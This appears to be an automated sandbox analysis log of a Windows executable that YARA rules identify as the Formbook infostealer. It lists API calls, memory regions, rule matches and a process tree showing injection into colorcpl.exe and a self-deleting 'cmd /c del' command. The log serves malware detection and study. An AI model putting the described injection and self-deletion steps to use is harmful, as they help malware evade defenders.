          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0132B040 NtSuspendThread,4_2_0132B040
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013298A0 NtWriteVirtualMemory,4_2_013298A0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329B00 NtSetValueKey,4_2_01329B00
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0132A3B0 NtGetContextThread,4_2_0132A3B0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329A10 NtQuerySection,4_2_01329A10
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329A80 NtOpenDirectoryObject,4_2_01329A80
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0132AD30 NtSetContextThread,4_2_0132AD30
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329520 NtWaitForSingleObject,4_2_01329520
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329560 NtWriteFile,4_2_01329560
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013295F0 NtQueryInformationFile,4_2_013295F0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329730 NtQueryVirtualMemory,4_2_01329730
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0132A710 NtOpenProcessToken,4_2_0132A710
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329770 NtSetInformationFile,4_2_01329770
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0132A770 NtOpenThread,4_2_0132A770
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329760 NtOpenProcess,4_2_01329760
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329610 NtEnumerateValueKey,4_2_01329610
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329670 NtQueryInformationProcess,4_2_01329670
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01329650 NtQueryValueKey,4_2_01329650
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013296D0 NtCreateKey,4_2_013296D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F995D0 NtClose,LdrInitializeThunk,14_2_04F995D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99540 NtReadFile,LdrInitializeThunk,14_2_04F99540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F996E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04F996E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F996D0 NtCreateKey,LdrInitializeThunk,14_2_04F996D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99660 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04F99660
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99650 NtQueryValueKey,LdrInitializeThunk,14_2_04F99650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99FE0 NtCreateMutant,LdrInitializeThunk,14_2_04F99FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99780 NtMapViewOfSection,LdrInitializeThunk,14_2_04F99780
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99710 NtQueryInformationToken,LdrInitializeThunk,14_2_04F99710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99860 NtQuerySystemInformation,LdrInitializeThunk,14_2_04F99860
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99840 NtDelayExecution,LdrInitializeThunk,14_2_04F99840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F999A0 NtCreateSection,LdrInitializeThunk,14_2_04F999A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99910 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_04F99910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99A50 NtCreateFile,LdrInitializeThunk,14_2_04F99A50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F995F0 NtQueryInformationFile,14_2_04F995F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99560 NtWriteFile,14_2_04F99560
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F9AD30 NtSetContextThread,14_2_04F9AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99520 NtWaitForSingleObject,14_2_04F99520
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99670 NtQueryInformationProcess,14_2_04F99670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99610 NtEnumerateValueKey,14_2_04F99610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F997A0 NtUnmapViewOfSection,14_2_04F997A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F9A770 NtOpenThread,14_2_04F9A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99770 NtSetInformationFile,14_2_04F99770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99760 NtOpenProcess,14_2_04F99760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99730 NtQueryVirtualMemory,14_2_04F99730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F9A710 NtOpenProcessToken,14_2_04F9A710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F998F0 NtReadVirtualMemory,14_2_04F998F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F998A0 NtWriteVirtualMemory,14_2_04F998A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F9B040 NtSuspendThread,14_2_04F9B040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99820 NtEnumerateKey,14_2_04F99820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F999D0 NtCreateProcessEx,14_2_04F999D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99950 NtQueueApcThread,14_2_04F99950
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99A80 NtOpenDirectoryObject,14_2_04F99A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99A20 NtResumeThread,14_2_04F99A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99A10 NtQuerySection,14_2_04F99A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99A00 NtProtectVirtualMemory,14_2_04F99A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F9A3B0 NtGetContextThread,14_2_04F9A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F99B00 NtSetValueKey,14_2_04F99B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067B90 NtCreateFile,14_2_03067B90
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067D70 NtAllocateVirtualMemory,14_2_03067D70
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067C40 NtReadFile,14_2_03067C40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067CC0 NtClose,14_2_03067CC0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067B8B NtCreateFile,14_2_03067B8B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067D6C NtAllocateVirtualMemory,14_2_03067D6C
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03067CBA NtReadFile,14_2_03067CBA
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_00851B900_2_00851B90
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_0086B8870_2_0086B887
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_008668A20_2_008668A2
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_008680D70_2_008680D7
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_00857B460_2_00857B46
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_00859B400_2_00859B40
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_00867FB30_2_00867FB3
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 0_2_008557690_2_00855769
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041B9D04_2_0041B9D0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041B1FD4_2_0041B1FD
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041C1844_2_0041C184
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00408A304_2_00408A30
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041B4954_2_0041B495
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041C7034_2_0041C703
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041BF144_2_0041BF14
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0041B7854_2_0041B785
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0086B8874_2_0086B887
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_008668A24_2_008668A2
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_008680D74_2_008680D7
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00851B904_2_00851B90
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00857B464_2_00857B46
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00859B404_2_00859B40
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_00867FB34_2_00867FB3
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_008557694_2_00855769
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013041204_2_01304120
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_012EF9004_2_012EF900
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013099BF4_2_013099BF
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0130A8304_2_0130A830
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013BE8244_2_013BE824
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013A10024_2_013A1002
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013120A04_2_013120A0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013B20A84_2_013B20A8
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_012FB0904_2_012FB090
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013B28EC4_2_013B28EC
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013B2B284_2_013B2B28
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0130A3094_2_0130A309
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0130AB404_2_0130AB40
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0138CB4F4_2_0138CB4F
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0131EBB04_2_0131EBB0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0130EB9A4_2_0130EB9A
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0131138B4_2_0131138B
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013923E34_2_013923E3
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013A03DA4_2_013A03DA
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013ADBD24_2_013ADBD2
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0131ABD84_2_0131ABD8
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0130B2364_2_0130B236
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0139FA2B4_2_0139FA2B
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013B22AE4_2_013B22AE
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013A4AEF4_2_013A4AEF
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_012E0D204_2_012E0D20
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013B2D074_2_013B2D07
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013B1D554_2_013B1D55
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013125814_2_01312581
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013A2D824_2_013A2D82
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_012FD5E04_2_012FD5E0
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013B25DD4_2_013B25DD
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_012F841F4_2_012F841F
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_0130B4774_2_0130B477
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013AD4664_2_013AD466
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013A44964_2_013A4496
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013B1FF14_2_013B1FF1
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013BDFCE4_2_013BDFCE
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_01306E304_2_01306E30
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013AD6164_2_013AD616
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: 4_2_013B2EF74_2_013B2EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_05022D0714_2_05022D07
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_05021D5514_2_05021D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F7B47714_2_04F7B477
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_05012D8214_2_05012D82
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_050225DD14_2_050225DD
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F6841F14_2_04F6841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F6D5E014_2_04F6D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0501D46614_2_0501D466
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F8258114_2_04F82581
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0501449614_2_05014496
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F50D2014_2_04F50D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F76E3014_2_04F76E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0502DFCE14_2_0502DFCE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_05021FF114_2_05021FF1
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0501D61614_2_0501D616
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_05022EF714_2_05022EF7
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F820A014_2_04F820A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F6B09014_2_04F6B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F7A83014_2_04F7A830
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0501100214_2_05011002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0502E82414_2_0502E824
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F799BF14_2_04F799BF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_050220A814_2_050220A8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F7412014_2_04F74120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_050228EC14_2_050228EC
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F5F90014_2_04F5F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_05022B2814_2_05022B28
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F7B23614_2_04F7B236
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0501DBD214_2_0501DBD2
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_050103DA14_2_050103DA
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_050023E314_2_050023E3
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F8ABD814_2_04F8ABD8
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0500FA2B14_2_0500FA2B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F8EBB014_2_04F8EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F8138B14_2_04F8138B
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_050222AE14_2_050222AE
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04FFCB4F14_2_04FFCB4F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F7AB4014_2_04F7AB40
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_05014AEF14_2_05014AEF
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_04F7A30914_2_04F7A309
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03058A3014_2_03058A30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0306C18414_2_0306C184
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_0306BF1414_2_0306BF14
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03052FB014_2_03052FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 14_2_03052D9014_2_03052D90
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: String function: 0085DF39 appears 54 times
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: String function: 00852CB0 appears 90 times
          Source: C:\Users\user\Desktop\PO8479349743085.exeCode function: String function: 012EB150 appears 139 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04F5B150 appears 136 times
          Source: PO8479349743085.exe, 00000000.00000003.258727966.0000000003136000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO8479349743085.exe
          Source: PO8479349743085.exe, 00000004.00000002.303837549.00000000013DF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO8479349743085.exe
          Source: PO8479349743085.exe, 00000004.00000002.304287369.0000000002F33000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs PO8479349743085.exe
          Source: 0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.483500047.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.303207332.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.484413318.0000000004D20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.484413318.0000000004D20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000E.00000002.484363775.0000000004CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000E.00000002.484363775.0000000004CF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.303608231.0000000001280000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.303608231.0000000001280000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.303384560.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.303384560.0000000000D80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.263141935.0000000002FC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.263141935.0000000002FC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.PO8479349743085.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.PO8479349743085.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.PO8479349743085.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.PO8479349743085.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO8479349743085.exe.2fc0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO8479349743085.exe.2fc0000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.PO8479349743085.exe.2fc0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.PO8479349743085.exe.2fc0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@15/5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
          Source: PO8479349743085.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO8479349743085.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: PO8479349743085.exeReversingLabs: Detection: 14%
          Source: C:\Users\user\Desktop\PO8479349743085.exeFile read: C:\Users\user\Desktop\PO8479349743085.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO8479349743085.exe 'C:\Users\user\Desktop\PO8479349743085.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Users\user\Desktop\PO8479349743085.exe C:\Users\user\Desktop\PO8479349743085.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO8479349743085.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO8479349743085.exeProcess created: C:\Users\user\Desktop\PO8479349743085.exe C:\Users\user\Desktop\PO8479349743085.exeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO8479349743085.exe'Jump to behavior
          Source: PO8479349743085.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: PO8479349743085.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: PO8479349743085.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
